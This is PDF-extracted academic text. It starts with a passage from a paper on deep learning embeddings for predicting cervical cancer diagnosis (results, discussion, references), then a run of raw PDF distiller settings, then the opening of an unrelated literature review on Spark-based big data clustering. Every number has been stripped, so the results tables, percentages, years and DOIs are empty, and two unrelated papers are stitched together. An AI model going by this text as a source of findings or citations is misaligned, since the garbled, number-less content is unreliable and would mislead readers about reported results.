(first line of each table with empty subset) up to settings where cytology and colposcopy (hinselmann and schiller) results are available. diagnosis prediction results our proposed architectures with embedding regularization achieved the best diagnosis prediction results in most cases (tables and ) when compared with other neural table performance of the proposed architectures in terms of area under the precision–recall curve. subset baseline semi sym zero svm k-nn dectree . . . . . . . c . . . . . . . h . . . . . . . s . . . . . . . ch . . . . . . . cs . . . . . . . hs . . . . . . . chs . . . . . . . best notes: the subset of observable screening strategies include: cytology (c), hinselmann (h), and schiller (s). baseline, deep feed-forward neural network; semi, semi-supervised dimensionality reduction (eq. ); sym, symmetry mapping dimensionality reduction (eq. ); zero, zero mapping dimensionality reduction (eq. ); svm, support vector machine; k-nn, k-nearest neighbors; dectree, decision tree. we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network approaches. furthermore, the fully supervised embeddings improved the performance of the semi-supervised approach (eq. ), through both the strategies (symmetric and zero mapping). the relative gains in terms of area under the pr curve depend on the subset of observable modalities, ranging from . % when only medical records are observed to . % when the outcome of all the screening procedures is known. using a paired difference student’s t-test (menke & martinez, ) with a % confidence level, zero-mapping methodology achieved better results than the baseline and semi-supervised learning schemes. we found no statistical differences between the symmetry and zero mappings. we validated the performance of traditional machine learning models such as support vector machines (svm) with radial basis function kernel (scholkopf et al., ), k-nearest neighbors (peterson, ), and decision trees (quinlan, ). in general, the proposed models surpassed the performance of the classical methodologies in terms of area under the pr curve. the svm model achieved better logarithmic loss given the post-processing of its scores using the logistic regression model that directly optimize this metric. further improvements could be observed by post-processing the outcome of the other strategies. the gains achieved by the mapping-based supervised embeddings happen because the proposed fully-supervised strategies aim to reduce the overlap between observations from both classes. in the past, researchers showed that class overlap has higher correlation with the model performance than the imbalance ratio in highly unbalanced datasets (cruz et al., ). the visualization of the embeddings through the t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ) confirms this aspect, because in t-sne fully supervised embeddings achieve better separability and fewer overlapping clusters (figs. – ). table performance of the proposed architectures in terms of logarithmic loss. subset baseline semi sym zero svm k-nn dectree . . . . . . . c . . . . . . . h . . . . . . . s . . . . . . . ch . . . . . . . cs . . . . . . . hs . . . . . . . chs . . . . . . . best notes: the subset of observable screening strategies include: cytology (c), hinselmann (h), and schiller (s). area under the precision–recall curve. baseline, deep feed-forward neural network; semi, semi-supervised dimensionality reduction (eq. ); sym, symmetry mapping dimensionality reduction (eq. ); zero, zero mapping dimensionality reduction (eq. ); svm, support vector machine; k-nn, k-nearest neighbors; dectree, decision tree. we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure two-dimensional projection of the unsupervised embedding using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- figure two-dimensional projection of the semi-supervised embedding using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure two-dimensional projection of the semi-supervised embedding with symmetry mapping using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- figure two-dimensional projection of the supervised embedding with zero mapping using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for visualization purposes, we are using t-sne based upon neighborhood similarities, since learning a valuable representation in a two-dimensional space raises difficulties. moreover, because of the high dimensionality of our embeddings, their reduction capabilities rely on their sparsity. results in other applications to observe the impact of our method, we validated the performance of the aforementioned model architectures on several biomedical datasets available on the uc irvine machine learning repository. thus, we assessed the model’s performance on nine datasets. the machine learning models we proposed achieved high prediction results, being the zero-mapping approach the best model in most cases (tables and ). table performance of the proposed architectures on other datasets downloaded from uc irvine machine learning repository (university of california irvine, ), measured through the area under the precision–recall curve. dataset baseline semi sym zero breast cancer mangasarian, street & wolberg ( ) . . . . mammography elter, schulz-wendtland & wittenberg ( ) . . . . parkinson little et al. ( ) . . . . pima diabetes smith et al. ( ) . . . . lung cancer hong & yang ( ) . . . . cardiotocography ayres-de campos et al. ( ) . . . . spectf heart kurgan et al. ( ) . . . . arcene guyon et al. ( ) . . . . colposcopy qa fernandes, cardoso & fernandes ( b) . . . . best note: we highlight the best performing models in bold. table performance of the proposed architectures on other datasets downloaded from uc irvine machine learning repository (university of california irvine, ), measured through logarithmic loss. dataset baseline semi sym zero breast cancer mangasarian, street & wolberg ( ) . . . . mammographic elter, schulz-wendtland & wittenberg ( ) . . . . parkinson little et al. ( ) . . . . pima diabetes smith et al. ( ) . . . . lung cancer hong & yang ( ) . . . . cardiotocography ayres-de campos et al. ( ) . . . . spectf heart kurgan et al. ( ) . . . . arcene guyon et al. ( ) . . . . colposcopy qa fernandes, cardoso & fernandes ( b) . . . . best note: we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this outcome suggests that mapping the majority class to a unique point in the space might improve the learning effectiveness in unbalanced settings. this idea draws a link between binary and one-class classification, and we plan to explore it more in the future. discussion as shown in the results section, our deep learning algorithm can predict cervical cancer diagnosis with high accuracy. to further understand the clinical interpretability of our prediction model, we investigated which dataset risk features have the highest impact in the cervical cancer diagnosis for the patients. figure agglomerative clustering of features by impact on the embedding space. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fact, pre-invasive intra-epithelial lesions of the cervix and cervical cancer relate to hpv infection of oncological serotypes that progress to oncological lesions, and multiple factors contribute to this progress without a definite cause-dependent relation. the patterns that have highest acceptance in the literature regard presence of human immunodeficiency virus and smoking, followed by sexual risk behaviors such as early sexual initiation, promiscuity, multiple pregnancies, and a history of sexually transmitted infections. another factor involved is the use of oral contraceptives. from a technical point of view, while black-box machine learning techniques have achieved state-of-the-art results in several applications, the lack of interpretability of the induced models can limit their general acceptance by the medical community. thus, we tried to understand the relationships by using our prediction model to corroborate if they are supported by the medical literature. in this context, we studied the impact of the original features on the embedding space to find correlations in the decision process. to determine this impact, we perturbed each feature using all the other values from the feature’s domain, and then we computed the maximum impact of the features in the embedded space. finally, we applied an agglomerative clustering technique to aggregate features with similar impact in the embedding features. from a medical point of view, we validated several properties of interest (fig. ). for instance, risky sexual patterns such as an early sexual initiation and the presence (and lifespan) of stds (with a special focus on hpv) have the most similar impact in the predictive outcome of the model. also, smoking habits are associated by the model as having a similar effect as these sexual patterns. these relationships were already studied in the medical literature (louie et al., ; deacon et al., ). the similarity between the use of hormonal contraceptives with condylomatosis and the use of intrauterine devices with stds shows another interesting pattern that has not been quantified yet to the best of our knowledge. these patterns might be evidence of sexual patterns with high risk. conclusion cervical cancer is still a widespread disease nowadays, and its diagnosis often requires frequent and very time-consuming clinical exams. in this context, machine learning can provide effective tools to speed up the diagnosis process, by processing high-scale patients’ datasets in a few minutes. in this manuscript, we presented a computational system for the prediction of cervical patient diagnosis, and for the interpretation of its results. our system consists of a loss function that allows joint optimization of dimensionality reduction, and classification techniques able to promote relevant properties in the embedded spaces. our deep learning methods predicted the diagnosis of the patients with high accuracy, and their application to other datasets showed that their robustness and effectiveness is not bounded to cervical cancer. our methods can be used to analyze profiles of patients where the biopsy and potentially other screening results are missing, and are able to predict confidently if they have cervical cancer. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the future, we plan to employ alternative approaches for data missing imputation, such as oversampling through k-nearest neighbors (santos et al., ) or latent semantic indexing similarity (chicco & masseroli, ). we also plan to try alternative prediction models, like probabilistic latent semantic analysis (pinoli, chicco & masseroli, ). finally, we plan to extend our computational system by adding a feature selection step, able to state the most relevant features among the dataset. acknowledgements the authors thank the gynecology service of the hospital universitario de caracas, and francis nguyen (princess margaret cancer centre) for the english proof-reading of this manuscript. additional information and declarations funding this work was funded by the project “nanostima: macro-to-nano human sensing: towards integrated multimodal health monitoring and analytics/norte- - - feder- ” financed by the north portugal regional operational programme (norte ), under the portugal partnership agreement, and through the european regional development fund (erdf), and also by fundacao para a ciencia e a tecnologia (fct) within the phd grant number sfrh/bd/ / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nanostima: macro-to-nano human sensing: towards integrated multimodal health monitoring and analytics: norte- - -feder- . north portugal regional operational programme: norte . portugal partnership agreement. european regional development fund (erdf). fundacao para a ciencia e a tecnologia (fct): sfrh/bd/ / . competing interests the authors declare that they have no competing interests. author contributions � kelwin fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � davide chicco conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � jaime s. cardoso conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, proposed parts of the general strategy of the project. � jessica fernandes analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, construction of the dataset and domain expertise about the application. data availability the following information was supplied regarding data availability: the dataset is publicly available at the university of california, irvine machine learning repository: https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk +factors% the dataset is also available at github: https://github.com/kelwinfc/cervical-cancer- screening/tree/master/risk-factors/data the software code of the methods used in the project is available at github: https:// github.com/kelwinfc/cervical-cancer-screening/ we implemented the software in python . using the keras (chollet, ) and tensorflow (abadi et al., ) frameworks, and tested it on a computer running the linux ubuntu . operating system. references abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x, google brain. . tensorflow: a system for large-scale machine learning. in: proceedings of the th usenix symposium on operating systems design and implementation (osdi ), savannah, ga, usa. vol. , – . alipanahi b, delong a, weirauch mt, frey bj. . predicting the sequence specificities of dna- and rna-binding proteins by deep learning. nature biotechnology ( ): – doi . /nbt. . ayres-de campos d, bernardes j, garrido a, marques-de sa j, pereira-leite l. . sisporto . : a program for automated analysis of cardiotocograms. journal of maternal-fetal medicine ( ): – doi . / . bessa s, domingues i, cardosos js, passarinho p, cardoso p, rodrigues v, lage f. . normal breast identification in screening mammography: a study on , images. in: ieee international conference on bioinformatics and biomedicine (bibm). belfast: ieee, – . cangelosi d, pelassa s, morini m, conte m, bosco mc, eva a, sementa ar, varesio l. . artificial neural network classifier predicts neuroblastoma patients’ outcome. bmc bioinformatics ( ): . centers for disease control and prevention (cdc). . cervical cancer screening among women aged – years—united states, – . morbidity and mortality weekly report ( – ): . chicco d. . ten quick tips for machine learning in computational biology. biodata mining ( ): doi . /s - - - . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/ https://github.com/kelwinfc/cervical-cancer-screening/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chicco d, masseroli m. . software suite for gene and protein annotation prediction and similarity search. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . chicco d, sadowski p, baldi p. . deep autoencoder neural networks for gene ontology annotation predictions. in: proceedings of acm bcb . newport beach: acm, – . chollet f. . keras. available at https://github.com/keras-team/keras. cruz r, fernandes k, cardoso js, costa jfp. . tackling class imbalance with ranking. in: the international joint conference on neural networks. vancouver: ieee, – . davis j, goadrich m. . the relationship between precision-recall and roc curves. in: proceedings of the rd international conference on machine learning. pittsburgh: acm, – . deacon jm, evans cd, yule r, desai m, binns w, taylor c, peto j. . sexual behaviour and smoking as determinants of cervical hpv infection and of cin among those infected: a case– control study nested within the manchester cohort. british journal of cancer ( ): – doi . /bjoc. . . elter m, schulz-wendtland r, wittenberg t. . the prediction of breast cancer biopsy outcomes using two cad approaches that both emphasize an intelligible decision process. medical physics ( ): – doi . / . . fernandes k, cardoso js, astrup bs. a. automated detection and categorization of genital injuries using digital colposcopy. in: alexandre l, salvador sánchez j, rodrigues j, eds. iberian conference on pattern recognition and image analysis. faro: springer, – . fernandes k, cardoso js, fernandes j. b. transfer learning with partial observability applied to cervical cancer screening. in: alexandre l, salvador sánchez j, rodrigues j, eds. iberian conference on pattern recognition and image analysis. faro: springer, – . fernandes k, cardoso js, fernandes j. . temporal segmentation of digital colposcopies. in: paredes r, cardoso j, pardo x, eds. iberian conference on pattern recognition and image analysis. santiago de compostela: springer, – . graffar m. . une méthode de classification sociale d’échantillons de population. courrier ( ): – . guyon i, gunn s, ben-hur a, dror g. . result analysis of the nips feature selection challenge. in: weiss y, schölkopf b, platt jc, eds. advances in neural information processing systems. vancouver: neural information processing systems foundation, – . he k, zhang x, ren s, sun j. . delving deep into rectifiers: surpassing human-level performance on imagenet classification. in: proceedings of ieee iccv , santiago, chile, – . hong z-q, yang j-y. . optimal discriminant plane for a small number of samples and design method of classifier on the plane. pattern recognition ( ): – doi . / - ( ) -f. kauffman rp, griffin sj, lund jd, tullar pe. . current recommendations for cervical cancer screening: do they render the annual pelvic examination obsolete? medical principles and practice ( ): – doi . / . kiros r, salakhutdinov r, zemel rs. . unifying visual-semantic embeddings with multimodal neural language models. available at http://arxiv.org/abs/ . . kurgan la, cios kj, tadeusiewicz r, ogiela m, goodenday ls. . knowledge discovery approach to automated cardiac spect diagnosis. artificial intelligence in medicine ( ): – doi . /s - ( ) - . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tcbb. . https://github.com/keras-team/keras http://dx.doi.org/ . /bjoc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) -f http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lacoste-julien s, sha f, jordan mi. . disclda: discriminative learning for dimensionality reduction and classification. in: bengio y, schuurmans d, lafferty jd, williams cki, culotta a, eds. advances in neural information processing systems. vancouver: neural information processing systems foundation, – . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . levy o, goldberg y, ramat-gan i. . linguistic regularities in sparse and explicit word representations. in: morante r, yih sw, eds. conll. baltimore: association for computational linguistics, – . li w, prasad s, fowler je, bruce lm. . locality-preserving dimensionality reduction and classification for hyperspectral image analysis. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . little ma, mcsharry pe, roberts sj, costello da, moroz im. . exploiting nonlinear recurrence and fractal scaling properties for voice disorder detection. biomedical engineering online ( ): doi . / - x- - . louie ks, de sanjose s, diaz m, castellsague x, herrero r, meijer cj, shah k, franceschi s, munoz n, bosch fx. . early age at first sexual intercourse and early pregnancy are risk factors for cervical cancer in developing countries. british journal of cancer ( ): – doi . /sj.bjc. . mangasarian ol, street wn, wolberg wh. . breast cancer diagnosis and prognosis via linear programming. operations research ( ): – doi . /opre. . . . menke j, martinez tr. . using permutations instead of student’s t distribution for p-values in paired-difference algorithm comparisons. in: ieee international joint conference on neural networks, proceedings. vol. . budapest: ieee, – . moore jh. . computational analysis of gene-gene interactions using multifactor dimensionality reduction. expert review of molecular diagnostics ( ): – doi . / . . . . peterson le. . k-nearest neighbor. scholarpedia ( ): doi . /scholarpedia. . pinoli p, chicco d, masseroli m. . computational algorithms to predict gene ontology annotations. bmc bioinformatics (suppl. ):s doi . / - - -s -s . plissiti me, nikou c. . a review of automated techniques for cervical cell image analysis and classification. in: andreaus u, iacoviello d, eds. biomedical imaging and computational modeling in biomechanics. dordrecht: springer, – . quinlan jr. . induction of decision trees. machine learning ( ): – doi . /bf . ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. in: international conference on medical image computing and computer-assisted intervention. munich: springer, – . santos ms, abreu ph, garca-laencina pj, simão a, carvalho a. . a new cluster-based oversampling method for improving survival prediction of hepatocellular carcinoma patients. journal of biomedical informatics : – doi . /j.jbi. . . . scholkopf b, sung k-k, burges cj, girosi f, niyogi p, poggio t, vapnik v. . comparing support vector machines with gaussian kernels to radial basis function classifiers. ieee transactions on signal processing ( ): – doi . / . . smith jw, everhart j, dickson w, knowler w, johannes r. . using the adap learning algorithm to forecast the onset of diabetes mellitus. in: proceedings of the annual symposium on fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nature http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . / - x- - http://dx.doi.org/ . /sj.bjc. http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ computer application in medical care. new york: american medical informatics association, . srivastava n, hinton ge, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning research ( ): – . tieleman t, hinton g. . lecture . —rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for machine learning ( ): – . university of california irvine. . machine learning repository. available at http://archive.ics. uci.edu/ml/ (accessed august ). university of california irvine machine learning repository. . cervical cancer (risk factors) data set. available at https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk +factors% (accessed february ). van der maaten l, hinton g. . visualizing data using t-sne. journal of machine learning research : – . van der maaten l, postma e, van den herik j. . dimensionality reduction: a comparative. journal of machine learning research : – . vincent p, larochelle h, bengio y, manzagol p-a. . extracting and composing robust features with denoising autoencoders. in: proceedings of icml . helsinki: acm, – . xu t, zhang h, huang x, zhang s, metaxas dn. . multimodal deep learning for cervical dysplasia diagnosis. in: international conference on medical image computing and computer- assisted intervention. athens: springer, – . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://archive.ics.uci.edu/ml/ http://archive.ics.uci.edu/ml/ https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supervised deep learning embeddings for the prediction of cervical cancer diagnosis introduction methods dataset results discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted august accepted november published november corresponding author mozamel m. saeed, m.musa@psau.edu.sa, mozamel @gmail.com academic editor feng xia additional information and declarations can be found on page doi . /peerj-cs. copyright saeed et al. distributed under creative commons cc-by . open access big data clustering techniques based on spark: a literature review mozamel m. saeed , zaher al aghbari and mohammed alsharidah department of computer science, prince sattam bin abdul aziz, riyadh, saudi arabia department of computer science, university of sharjah, sharjah, united arab emirates abstract a popular unsupervised learning method, known as clustering, is extensively used in data mining, machine learning and pattern recognition. the procedure involves grouping of single and distinct points in a group in such a way that they are either similar to each other or dissimilar to points of other clusters. traditional clustering methods are greatly challenged by the recent massive growth of data. therefore, several research works proposed novel designs for clustering methods that leverage the benefits of big data platforms, such as apache spark, which is designed for fast and distributed massive data processing. however, spark-based clustering research is still in its early days. in this systematic survey, we investigate the existing spark-based clustering methods in terms of their support to the characteristics big data. moreover, we propose a new taxonomy for the spark-based clustering methods. to the best of our knowledge, no survey has been conducted on spark-based clustering of big data. therefore, this survey aims to present a comprehensive summary of the previous studies in the field of big data clustering using apache spark during the span of – . this survey also highlights the new research directions in the field of clustering massive data. subjects data mining and machine learning, data science, distributed and parallel computing keywords spark-based clustering, big data clustering, spark, big data introduction with the emergence of g technologies, a tremendous amount of data is being generated very quickly, which turns into a massive amount that is termed as big data. the attributes of big data such as huge volume, a diverse variety of data, high velocity and multivalued data make data analytics difficult. moreover, extracting meaningful information from such volumes of data is not an easy task (bhadani & jothimani, ). as an indispensable tool of data mining, clustering algorithms play an essential role in big data analysis. clustering methods are mainly divided into density-based, partition-based, hierarchical, and model-based clustering. all these clustering methods are developed to tackle the same problems of grouping single and distinct points in a group in such a way that they are either similar to each other or dissimilar to points of other clusters. they work as follows: ( ) randomly select initial clusters and ( ) iteratively optimize the clusters until an optimal solution is reached (dave & gianey, ). clustering has an enormous application. for instance, clustering is used in intrusion detection system for the detection of anomaly behaviours (othman et al., ; hu et al., ). clustering is also used extensively in text analysis to classify documents how to cite this article saeed mm, al aghbari z, alsharidah m. . big data clustering techniques based on spark: a literature review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:m.musa@psau.edu.sa mailto:mozamel @gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. into different categories (fasheng & xiong, ; baltas, kanavos & tsakalidis, ). however, as the scale of the data generated by modern technologies is rising exponentially, these methods become computationally expensive and do not scale up to very large datasets. thus, they are unable to meet the current demand of contemporary data-intensive applications (ajin & kumar, ). to handle big data, clustering algorithms must be able to extract patterns from data that are unstructured, massive and heterogeneous. apache spark is an open-source platform designed for fast-distributed big data processing. primarily, spark refers to a parallel computing architecture that offers several advanced services such machine learning algorithms and real time stream processing (shoro & soomro, ). as such, spark is gaining new momentum, a trend that has seen the onset of wide adoption by enterprises because of its relative advantages. spark grabbed the attention of researchers for processing big data because of its supremacy over other frameworks like hadoop mapreduce (verma, mansuri & jain, ). spark can also run in hadoop clusters and access any hadoop data source. moreover, spark parallelization of clustering algorithms is an active research problem, and researchers are finding ways for improving the performance of clustering algorithms. the implementation of clustering algorithms using spark has recently attracted a lot of research interests. this survey presents the state-of-the-art research on clustering algorithms using spark platform. research on this topic is relatively new. efforts started to increase in the last few years, after the big data platform, such as apache spark, was developed. this resulted in a number of research works that designed clustering algorithms to take advantage of the big data platforms, especially spark due to its speed advantage. therefore, review articles are needed to show an overview of the methodologies of clustering big data, highlight the findings of research and find the existing gaps this area. consequently, few researchers have published review articles (labrinidis & jagadish, ; gousios, ; aziz, zaidouni & bellafkih, ; salloum et al., ; mishra, pathan & murthy, ; aziz, zaidouni & bellafkih, ; assefi et al., ; armbrust et al., ; xin et al., ; xu & tian, ; zerhari, lahcen & mouline, ). these review articles are either before or do not present a comprehensive discussion on all types of clustering methods. therefore, a comprehensive review on clustering algorithms of big data using apache spark is needed because it is conducted based on a scientific search strategy. to the best of our knowledge, no survey has been conducted on spark-based clustering of big data. for this purpose, this survey aims to present a comprehensive summary of the previous studies in the field of big data clustering using apache spark during the span of – . the contributions of this review are: • this review includes quality literature from pre-defined resources and based on pre- defined inclusion/exclusion criteria. therefore, out of the full-text articles studied, articles were included. • a taxonomy of spark-based clustering methods that may point researchers to new techniques or new research areas. saeed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • a comprehensive discussion on the existing spark-based clustering methods and the research gaps in this area. furthermore, we presented some suggestions for new research directions. we believe that researchers in the general area of cluster big data and specially those designing and 